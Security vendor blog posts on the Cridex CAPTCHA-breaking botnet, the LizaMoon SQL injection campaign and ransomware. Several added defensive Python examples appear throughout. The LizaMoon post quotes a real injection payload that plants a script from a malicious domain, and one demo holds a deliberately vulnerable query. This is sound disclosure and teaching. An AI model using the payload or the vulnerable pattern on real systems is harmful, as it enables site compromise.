
Trojan caught on camera shows CAPTCHA is still a security issue
Posted: 30 Jan 2012 02:00 AM

 

In a series of blog posts a few years back, we covered how malware could abuse and circumvent online services that use CAPTCHA tests as part of their security (1, 2). In this post, we take a look at a recent malware variant from the wild, caught on camera, which shows that the CAPTCHA tests used by some online services are still weak and can be broken by malware.

 

The image below (Picture 1) shows this CAPTCHA-breaking malware's ecosystem, which we'll describe step by step.

Step 1: The starting point of an infection is a banking Trojan variant known as Cridex. This variant is propagated via malicious email messages that hold shortened links leading to exploit kits (see this example), in our case the Blackhole exploit kit.

Step 2: If the exploit is successful, the Cridex variant is downloaded to the machine.

Step 3: Cridex runs on the machine.

Step 4: Cridex is a data-stealing Trojan that is similar to Zeus in the way it operates: it logs content from Web sessions and alters them to harvest information from the infected user. The Cridex configuration file downloaded by this variant (safe to view and download, and shortened here) shows which websites the variant monitors and steals data from, along with Web form injection points (data alteration injected into Web forms to harvest additional data such as ATM PINs). We have observed that Facebook, Twitter, and many banking services are targets. A partial list of targeted websites can be found here.

Step 5: Any stolen data from the system is uploaded to a command and control server.

 

Picture 1: The Cridex ecosystem:

 

Step 6: One of the components downloaded by Cridex along with the configuration file is a propagation module, or spamming module, that allows the botmaster to send spam and malicious emails to infect other systems and grow the botnet. The spamming module contains backdoor components that browse the Web on behalf of the user. The module opens Web sessions to online mail services and registers new email accounts that the bot later uses to send spam and malicious emails. As we know, online mail services have security checks such as CAPTCHA challenges to verify that a human is indeed behind any account registration.

Step 7: According to our findings, CAPTCHA challenges can in some cases be broken with the help of a CAPTCHA-breaking server, which allows the bot to register a mail account after only a few attempts. This video documents the registration of an online mail account by the bot on an infected machine:

 

Video:

Click here to watch the video on Youtube

 

 

The CAPTCHA-breaking process consists of posting CAPTCHA challenge images harvested from the online email registration form to a remote Web server (the CAPTCHA-breaking server). The request is an HTTP POST with the CAPTCHA image embedded in its body. Once the server has processed the image, it returns a response in JSON format containing the CAPTCHA text it derived for the submitted image (see Picture 2). The backdoor component then tries that returned text in the online email account registration form. If the CAPTCHA-breaking server's output is wrong and does not match the CAPTCHA image challenge, the process continues and the next CAPTCHA image is submitted, until the server manages to break a CAPTCHA. Picture 3 shows the images submitted to the CAPTCHA-breaking server and the corresponding results from the server. Not all attempts succeed in breaking the CAPTCHA, but some do; in our example it took 6 attempts.

 

The malware reports back to the CAPTCHA-breaking server whether the result it received actually broke the CAPTCHA. Picture 4 shows the HTTP requests that tell the CAPTCHA-breaking server whether the CAPTCHA text it returned in a previous session was indeed successful. The outcome is signalled with the r parameter: if it is 0 (&r=0), the CAPTCHA break attempt was unsuccessful, whereas if it is 1 (&r=1), the attempt was a success.
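The traffic pattern described above (repeated image POSTs to one host, each followed by a GET carrying r=0 or r=1) is something a proxy or egress log can be searched for. The script below is an added example for that purpose and is not code from the post or from Websense. It assumes a simplified log format of one request per line ("time client method url request-content-type"), a hypothetical relay host name, and that an image POST shows up as an image/* or multipart/form-data body; every log line in it is constructed.

```python
"""Flag clients whose traffic matches the CAPTCHA-relay pattern:
image POSTs to a host, then GETs to the same host carrying r=0 / r=1.
Log format, host names and all lines below are constructed for this example."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10:00:01 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:02 10.0.0.5 GET http://relay.example.invalid/res.php?id=17&r=0 -
10:00:05 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:06 10.0.0.5 GET http://relay.example.invalid/res.php?id=18&r=0 -
10:00:09 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:10 10.0.0.5 GET http://relay.example.invalid/res.php?id=19&r=0 -
10:00:13 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:14 10.0.0.5 GET http://relay.example.invalid/res.php?id=20&r=0 -
10:00:17 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:18 10.0.0.5 GET http://relay.example.invalid/res.php?id=21&r=0 -
10:00:21 10.0.0.5 POST http://relay.example.invalid/in.php multipart/form-data
10:00:22 10.0.0.5 GET http://relay.example.invalid/res.php?id=22&r=1 -
10:01:00 10.0.0.9 POST http://photos.example.invalid/upload image/png
10:01:30 10.0.0.9 GET http://photos.example.invalid/album?id=3 -
"""

LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\S+)$")


def is_image_upload(content_type):
    # Assumption: a raw image body or a multipart upload means an image was posted.
    return content_type.startswith("image/") or content_type == "multipart/form-data"


def find_relay_clients(log_text, min_posts=3):
    """Return (client, host, posts, r0_reports, r1_reports) for each client/host
    pair that posted images at least min_posts times and afterwards sent that
    host GET requests carrying an r=0 or r=1 outcome parameter."""
    state = defaultdict(lambda: {"posts": 0, "r0": 0, "r1": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # skip lines that do not fit the format
        _, client, method, url, ctype = m.groups()
        parts = urlsplit(url)
        key = (client, parts.hostname)
        if method == "POST" and is_image_upload(ctype):
            state[key]["posts"] += 1
        elif method == "GET" and state[key]["posts"]:
            # Only count outcome reports sent to a host that already received images.
            r = parse_qs(parts.query).get("r", [])
            if r == ["0"]:
                state[key]["r0"] += 1
            elif r == ["1"]:
                state[key]["r1"] += 1
    return [
        (client, host, s["posts"], s["r0"], s["r1"])
        for (client, host), s in state.items()
        if s["posts"] >= min_posts and (s["r0"] + s["r1"]) > 0
    ]


if __name__ == "__main__":
    for hit in find_relay_clients(SAMPLE_LOG):
        print("possible CAPTCHA relay: client=%s host=%s posts=%d r=0:%d r=1:%d" % hit)
```

The threshold of three image POSTs keeps ordinary photo uploads out of the result; the second client in the sample posts one image and never reports an outcome, so only the first one is flagged, with five failed and one successful report, the same six-attempt shape the post observed.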

 

Picture 2: An HTTP POST request of an image to the CAPTCHA-breaking server and the response from the server

 

Picture 3: The images posted to the CAPTCHA-breaking server and their corresponding results

 

Picture 4: The malware reports to the CAPTCHA-breaking server if the CAPTCHA break attempt was successful

 

Websense® customers are protected from these threats by ACE™, our Advanced Classification Engine.

 

2012 Cyber Security Predictions from the Websense Security Labs
Posted: 17 Nov 2011 09:33 AM

With all of the crazy 2011 security breaches, exploits and notorious hacks, what can we expect for 2012? Last year’s Websense Security Labs predictions were very accurate, so these predictions should provide very useful guidance for security professionals. Here are the highlights; the full report can be downloaded here.

 

1. Your social media identity may prove more valuable to cybercriminals than your credit cards. Bad guys will actively buy and sell social media credentials in online forums.

Trust is the basis of social networking, so if a bad guy compromises your social media log-ins, there is a good chance they can manipulate your friends. Which leads us to prediction #2.

 

2. The primary blended attack method used in the most advanced attacks will be to go through your social media “friends,” mobile devices and through the cloud.

We’ve already seen one APT attack that used the chat functionality of a compromised social network account to get to the right user. Expect this to be the primary vector, along with mobile and cloud exploits, in the most persistent and advanced attacks of 2012.

 

3. 1,000+ different mobile device attacks coming to a smartphone or tablet near you.

People have been predicting this for years, but in 2011 it actually started to happen. And watch out: the number of people who fall victim to believable social engineering scams will go through the roof if the bad guys find a way to use mobile location-based services to design hyperspecific geolocation social engineering attempts.

 

4. SSL/TLS will put net traffic into a corporate IT blind spot.

Two items are increasing traffic over SSL/TLS secure tunnels for privacy and protection. First is the disruptive growth of mobile and tablet devices. And second, many of the largest, most commonly used websites, like Google, Facebook, and Twitter, are switching to https sessions by default, ostensibly a more secure transmission. But as more traffic moves through encrypted tunnels, many traditional enterprise security defenses are going to be left looking for a threat needle in a haystack, since they cannot inspect the encrypted traffic.

 

5. Containment is the new prevention.

For years, security defenses have focused on keeping cybercrime and malware out. Organizations on the leading edge will implement outbound inspection and will focus on adapting prevention technologies to be more about containment, severing communications, and data loss mitigation after an initial infection.

 

6. The London Olympics, U.S. presidential elections, Mayan calendar, and apocalyptic predictions will lead to broad attacks by criminals.

Cybercriminals will continue to take advantage of today’s 24-hour, up-to-the minute news cycle, only now they will infect users where they are less suspicious: sites designed to look like legitimate news services, Twitter feeds, Facebook posts/emails, LinkedIn updates, YouTube video comments, and forum conversations.

 

7. Social engineering and rogue anti-virus will continue to reign.

Scareware tactics and the use of rogue anti-virus, which decreased a bit in 2011, will stage a comeback. Except, instead of seeing “You have been infected” pages, we anticipate three areas will emerge as growing scareware subcategories in 2012: a growth in fake registry clean-up, fake speed improvement software, and fake back-up software mimicking popular personal cloud backup systems.

 

You can also watch a video of the Websense Security Labs discussing the predictions here:

 


Patrik Runald

Websense Labs Video: Speaking in Tongues: Malware C&C Encryption
Posted: 27 Sep 2011 11:56 AM

Historically, malware has used IRC to communicate outbound once it has infected a host. But what exactly is malware doing now? In this week’s Websense Security Labs video, researchers Ali Mesdaq and Stephan Chenette guide us through an explanation of malware that communicates using custom encryption. They explain which ports this malware uses, how it communicates, and what Websense does to stop it from infecting corporate networks and stealing valuable data.
 
Follow the latest breaking news on cyber security with the weekly Websense Security Labs Video diaries here.
 
Read more about how to protect your organization from malware that communicates using custom encryption here.

 


Patrik Runald

Meet “Morto the Magic Worm”
Posted: 02 Sep 2011 01:29 PM

In this week’s Websense Security Labs video, researchers Armin Buescher, Stephan Chenette and Gregory Newman introduce us to “Morto,” a very unusual worm spreading across networks. Unlike your typical PC malware, Trojan or Rogue AV, Morto is unique because of the curious and unusual ways in which it propagates. In this video, find out how Morto takes advantage of weak passwords to infiltrate and the atypical approach it takes to compromise additional hosts.

 


Patrik Runald

Video: Malware Hitching a Ride on WordPress
Posted: 22 Aug 2011 05:19 PM

In this week’s Websense Security Labs Video, Chris Astacio discusses a mass injection attack that is compromising a wide swath of WordPress sites through a vulnerability in TimThumb.php, a common module used in many WordPress themes.
 
This widespread attack compromised tens of thousands of domains, injecting code that led visitors to a site hosting malicious content. After the video, you can read an analysis of the exploit in our blog post here. That post features a link to the patched version of TimThumb that users can download to remove this vulnerability.

 

 


Patrik Runald

The Next Hotbed of Cybercrime Activity is... Canada?!?
Posted: 11 May 2011 04:25 AM

Cybercriminals are on the move again. And, this time, Canada is the prime target. IP addresses in China and Eastern Europe are highly scrutinized and undergoing intense evaluation. So hackers are on a quest to move their networks to countries, like Canada, that have better cyber reputations.

It's a little surprising to me as well. Previously, Canada was a place of great beer and hockey (next year, Habs!). But Websense recently conducted an analysis of Canada’s cyber security risk profile, and all trends pointed to Canada as the new launchpad for cybercriminals. For example:

 

  • Jump in Hosted Phishing Sites – Canada saw a huge increase in the number of servers hosting phishing sites, jumping 319 percent in the last year. This tremendous increase over the last 12 months is second only to Egypt in terms of the growth of sites hosting crimeware.
  • Increase in Bot Networks – Cybercriminals are moving their command and control centers to safer grounds. In the past eight months, Canada saw a 53 percent increase in bot networks. In fact, Canada scored the second highest for hosting bot networks, when compared to the U.S., France, Germany and China.
  • Malicious Websites – We’re seeing a trend of malicious websites decline across the board. However, Canada’s decline is tremendously slower, when compared to the countries listed above.
  • Overall Increase in Cybercrime – In Websense’s most recent Threat Report, Canada was #13 in the world for hosting cybercrime. Now they have jumped to #6 in the world in 2011. And, this number continues to rise.

 

 

More malicious content is being hosted in Canada than ever before. How will the public and private sector protect Canada? And, will the Canadian government be able to take down major Internet crime networks - similar to when the US brought down Rustock and Coreflood?

Here's a quick peek at the top countries hosting phishing sites for the first part of this year. You can clearly see that Canada now holds the number two position for hosting this type of crimeware.

 

 

So, the question I have for you folks - is this surprising to you? Why or why not? We'd love to hear from you in the comments below.



Patrik Runald

Update on LizaMoon mass-injection and Q&A
Posted: 31 Mar 2011 01:03 PM

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.

 

 

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

 

List updated: 4/1/2011 12:16pm PT

 

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

 

More information is available over on Stackoverflow.com.
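The statement quoted above builds its string literals out of char(NN)+char(NN)+... chains, which is why nothing readable appears in a raw log or database dump. The script below is an added example, not code from the post or from Websense: it decodes those chains so an administrator can see what was injected, then scans content rows for script tags pointing at the injected domains listed earlier in the post. The statement is copied from the post exactly, joined onto one line; the sample rows and the cdn.example.invalid host are constructed. Read literally, this particular statement substitutes a single space (char(32)) for the decoded tag wherever it occurs in FieldName.

```python
"""Decode char()-built literals from a URL-encoded SQL statement and look
for the resulting <script src=...> tag in content rows."""
import re
from urllib.parse import unquote_plus, urlsplit

# The statement quoted in the post, joined onto one line.
LIZAMOON_STATEMENT = (
    "+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)"
    "%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)"
    "%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)"
    "%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)"
    "%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)"
    "%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)"
    "%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)"
    "%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)"
    "%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)"
    "+as+varchar(8)))--"
)

# A few of the injected hosts listed earlier in the post.
KNOWN_INJECTION_HOSTS = {"lizamoon.com", "google-stats50.info",
                         "stats-master111.info", "milapop.com"}

# \b keeps "varchar(8000)" from being mistaken for a char() call.
CHAR_CHAIN = re.compile(r"(?:\bchar\(\d+\)\+?)+")
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\s\"'>]+)", re.IGNORECASE)


def decode_char_chain(chain):
    """Turn char(60)+char(47)+... into the text it builds."""
    return "".join(chr(int(n)) for n in re.findall(r"char\((\d+)\)", chain))


def decoded_literals(encoded_statement):
    """Return every char()-built literal in a URL-encoded statement, in order."""
    sql = unquote_plus(encoded_statement)   # %2B -> '+', '+' -> ' '
    return [decode_char_chain(m.group(0)) for m in CHAR_CHAIN.finditer(sql)]


def script_hosts(html_text):
    """Host names referenced by <script src=...> tags in a piece of HTML."""
    return [urlsplit(src).hostname for src in SCRIPT_SRC.findall(html_text)]


def find_injected_rows(rows, suspicious_hosts=KNOWN_INJECTION_HOSTS):
    """rows: (row_id, column_text) pairs pulled from a content table.
    Returns the ids whose text loads a script from a suspicious host."""
    return [row_id for row_id, text in rows
            if any(host in suspicious_hosts for host in script_hosts(text))]


# Constructed rows standing in for a content table.
SAMPLE_ROWS = [
    (1, "<title>Welcome</title><script src=http://google-stats50.info/ur.php></script>"),
    (2, "<title>About us</title><p>Nothing to see here.</p>"),
    (3, '<script src="https://cdn.example.invalid/app.js"></script>'),
]

if __name__ == "__main__":
    for literal in decoded_literals(LIZAMOON_STATEMENT):
        print(repr(literal))
    print("rows referencing injected hosts:", find_injected_rows(SAMPLE_ROWS))
```

Decoding the first literal yields the tag that ends up on the compromised pages; its host is one of the domains from the list above, so checking content rows against that list is a straightforward way to find injected records without waiting for a search engine to index them.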

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated, which is somewhat unusual. All the code does is redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 


What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

 

 

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

 

 

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.


So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and of how we stated that iTunes URLs had been compromised, but that the script had been neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign, created on March 25, 2011, was called lizamoon.com.

 

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results, but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected is significantly smaller.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to this being a vulnerability in a web application. We don't know which one(s) yet, but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in SQL Server itself; it means that the web application isn't filtering input from the user correctly.

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.
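The answer above about SQL Injection being a web application defect rather than a SQL Server defect is easiest to see with a vulnerable query beside its fixed form. The example below is added here and is not code from the post or from Websense. It uses Python's built-in sqlite3 so it runs anywhere; the pages table, the placeholder-host.invalid host in the injected input, and the use of executescript to stand in for a database driver that accepts several ';'-separated statements in one batch (the behaviour that lets an appended UPDATE run) are all assumptions of the example.

```python
"""Vulnerable string-built UPDATE beside a validated, parameterized one."""
import sqlite3

# Constructed input: a valid-looking id with an UPDATE appended after a ';'.
# The host is a placeholder, not one of the domains from the post.
INJECTED_INPUT = ("1; UPDATE pages SET body = body || "
                  "'<script src=http://placeholder-host.invalid/ur.php></script>'")


def fresh_db():
    """In-memory table standing in for a site's content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, "
                 "body TEXT, views INTEGER NOT NULL DEFAULT 0)")
    conn.executemany("INSERT INTO pages (id, title, body) VALUES (?, ?, ?)",
                     [(1, "Home", "<title>Home</title>"),
                      (2, "About", "<title>About</title>")])
    conn.commit()
    return conn


def record_view_vulnerable(conn, page_id):
    """BAD: untrusted text is spliced straight into the statement.
    executescript mimics a server/driver that runs a whole batch, so anything
    after a ';' in page_id executes as a second statement."""
    conn.executescript(f"UPDATE pages SET views = views + 1 WHERE id = {page_id}")


def record_view_safe(conn, page_id):
    """GOOD: reject anything that is not an integer, then bind the value as a
    parameter so the database never parses it as SQL. Returns False on reject."""
    try:
        pid = int(page_id)
    except (TypeError, ValueError):
        return False
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()
    return True


def views(conn, page_id):
    return conn.execute("SELECT views FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


def rows_with_script(conn):
    """Ids of rows whose body now carries a script tag (the injection's footprint)."""
    return [r[0] for r in conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script%' ORDER BY id")]


if __name__ == "__main__":
    bad = fresh_db()
    record_view_vulnerable(bad, INJECTED_INPUT)
    print("vulnerable path, rows carrying a script tag:", rows_with_script(bad))
    good = fresh_db()
    print("safe path accepted input:", record_view_safe(good, INJECTED_INPUT))
    print("safe path, rows carrying a script tag:", rows_with_script(good))
```

The fix has two independent parts: the type check stops non-numeric input before any query is built, and the bound parameter means that even a value that slips past validation is compared as data, never executed. Either alone would have blocked the appended UPDATE here; together they are the standard answer regardless of which SQL server sits behind the application.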

 

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

 

 

Patrik Runald

The Ransomway
Posted: 24 Feb 2011 10:36 PM

There are always different ways to make money. Cybercriminals know it, and their imagination is unlimited as far as we can tell. Sometimes they lure users into downloading a rogue AV as a treatment for an “infected computer”, other times they literally extort users to pay to get their own data or computer access back. Let's have a look into the infamous malware called ransomware.

 

In general we can divide this sort of malware into three separate categories:

  1. file encrypters

  2. system lockers

  3. application lockers

Even though their application varies, the aim is always the same. The victim has to pay, otherwise the data or access will be lost forever.

 

File encrypters

The first group represents the most notorious extortion tactic from the real world – “pay now, otherwise you will not see it again”. It all started around 1989, when the first ransomware was introduced – the PC Cyborg Trojan, alias the AIDS trojan horse. The basics have remained unchanged since. Once the trojan launches on a victim's computer, all custom data (files that are important from the user's perspective) is encrypted and is therefore inaccessible to the user. With PC Cyborg the victim was asked to post the ransom to a PO Box in Panama; nowadays the criminals ask users to send either an SMS to a premium-rate mobile number, or to transfer money to online payment services such as Egold, Liberty Services or others. The payment varies from $20 up to $200 depending on the sophistication of the malware and the greediness of the authors.

 

In 2004 Gpcode (also known as PGPCoder – Trojan-Ransom.Win32.GpCode) emerged into the world. Unlike PC Cyborg, which used a weak symmetric key for the whole encryption, Gpcode started with RC4 and carried on up to AES-256 wrapped in RSA-1024 public-key encryption – the symmetric encryption key is carried in the body of the virus, encrypted with the RSA public key. This sophisticated method makes the cipher unbreakable, and the victim has to either pay the ransom and hope for “honesty” from the attacker, or restore all data from the backup – if it exists. Once Gpcode finishes the encryption, the desktop changes to show a notification of what has just happened, with a message window explaining the same (Picture 1).

 

Picture 1 : Gpcode notification about encrypted files and the ransom request

 

 

Every folder with encrypted data contains a new file explaining the situation – either !_READ_ME_!.txt or HOW TO DECRYPT FILES.txt, and every encrypted file has a new extension added – either ._CRYPT or .ENCODED (Picture 2).

 

Picture 2 : Every folder contains the extortion text explanation

 

 

Files are not deleted so the recovery is theoretically possible unless the criminals are completely unscrupulous. You want to believe so, don't you?
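Because the file markers described above are consistent (the two note file names and the two added extensions), a responder can inventory an affected machine and compare it against a backup before deciding anything. The script below is an added example, not code from the post or from Websense; it builds a throwaway directory of constructed files so it runs offline, and the backup listing passed to restore_plan is likewise constructed.

```python
"""Inventory Gpcode-style artifacts in a directory tree and check which
renamed files have an original in a backup listing."""
import os
import tempfile
from pathlib import Path

# Markers described in the post.
RANSOM_NOTES = {"!_READ_ME_!.txt", "HOW TO DECRYPT FILES.txt"}
ENCRYPTED_SUFFIXES = ("._CRYPT", ".ENCODED")


def scan_tree(root):
    """Walk root and return sorted relative POSIX paths of ransom notes and
    renamed files, plus the folders that contain renamed files."""
    root = Path(root)
    notes, encrypted, folders = [], [], set()
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            rel = (Path(dirpath) / name).relative_to(root).as_posix()
            if name in RANSOM_NOTES:
                notes.append(rel)
            elif name.upper().endswith(ENCRYPTED_SUFFIXES):
                encrypted.append(rel)
                folders.add(Path(rel).parent.as_posix())
    return {"notes": sorted(notes), "encrypted": sorted(encrypted),
            "folders": sorted(folders)}


def original_name(rel_path):
    """Strip the added extension to recover the name the file had before."""
    for suffix in ENCRYPTED_SUFFIXES:
        if rel_path.upper().endswith(suffix):
            return rel_path[:-len(suffix)]
    return rel_path


def restore_plan(scan_result, backup_listing):
    """Split renamed files into those whose original exists in the backup
    listing (a set of relative paths) and those that do not."""
    recoverable, lost = [], []
    for rel in scan_result["encrypted"]:
        (recoverable if original_name(rel) in backup_listing else lost).append(rel)
    return recoverable, lost


def build_sample_tree():
    """Create a throwaway directory mimicking an affected profile.
    Every file in it is constructed for this example."""
    root = Path(tempfile.mkdtemp(prefix="ransom_scan_demo_"))
    (root / "docs").mkdir()
    (root / "docs" / "report.doc._CRYPT").write_bytes(b"\x8a\x11\x3f")
    (root / "docs" / "!_READ_ME_!.txt").write_text("constructed ransom note")
    (root / "photos").mkdir()
    (root / "photos" / "trip.jpg.ENCODED").write_bytes(b"\x00\xfe\x7c")
    (root / "photos" / "HOW TO DECRYPT FILES.txt").write_text("constructed ransom note")
    (root / "todo.txt").write_text("untouched file")
    return root


if __name__ == "__main__":
    result = scan_tree(build_sample_tree())
    print(result)
    # Constructed backup listing: only the document was backed up.
    print(restore_plan(result, {"docs/report.doc"}))
```

The inventory is what you want in hand before touching anything: the note files tell you which folders were processed, the renamed files tell you what needs restoring, and the split from restore_plan shows at a glance what the backup covers and what it does not.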

 

The virus uses the Microsoft Enhanced Cryptographic Provider, built into Windows by default, to encrypt files, which makes the whole operation extremely fast.

 

Since the first version of Gpcode was discovered we have seen many different versions, and also copycats with weak or embedded keys. Nevertheless, this kind of malware can cause real harm to the victims unless all data has been freshly backed up.

 

System lockers

The second category contains malware that blocks access to the vital or essential parts of the system. From samples we have seen we could divide them into two types:

  1. screen lockers

  2. boot lockers

 

The former works by either blocking interaction with the system completely and showing an extortion message (Picture 3), or only partially covering the screen with an embarrassing image and message (Picture 4) – e.g. Trojan.Ransomlock or Trojan.SMSlock. As the message can “reveal” unwanted details about the victim (“you surfed porn sites for free, now you have to pay”), the victims often pay without contacting any professionals to help them out.

 

Picture 3 : The access to the machine is blocked by the malware's notification screen

 

 

Picture 4 :  Embarrassing ad ransomware tactic.

 

 

 

Both of these were first seen around April 2009, and mostly in Russia, where there is no problem getting hold of anonymous premium-rate numbers – as opposed to Western countries, which ask for strong proof of identity. As with the previous category, there is no assurance that the victim will receive the unlocking key once the text is sent. As happens with ransoms in general, the criminals can ask for more once they see the victim is willing to pay. Fortunately, this malware is not as sophisticated as the previously mentioned one, so there is a chance of getting hold of an unlocking utility or a code generator from the Internet.

 

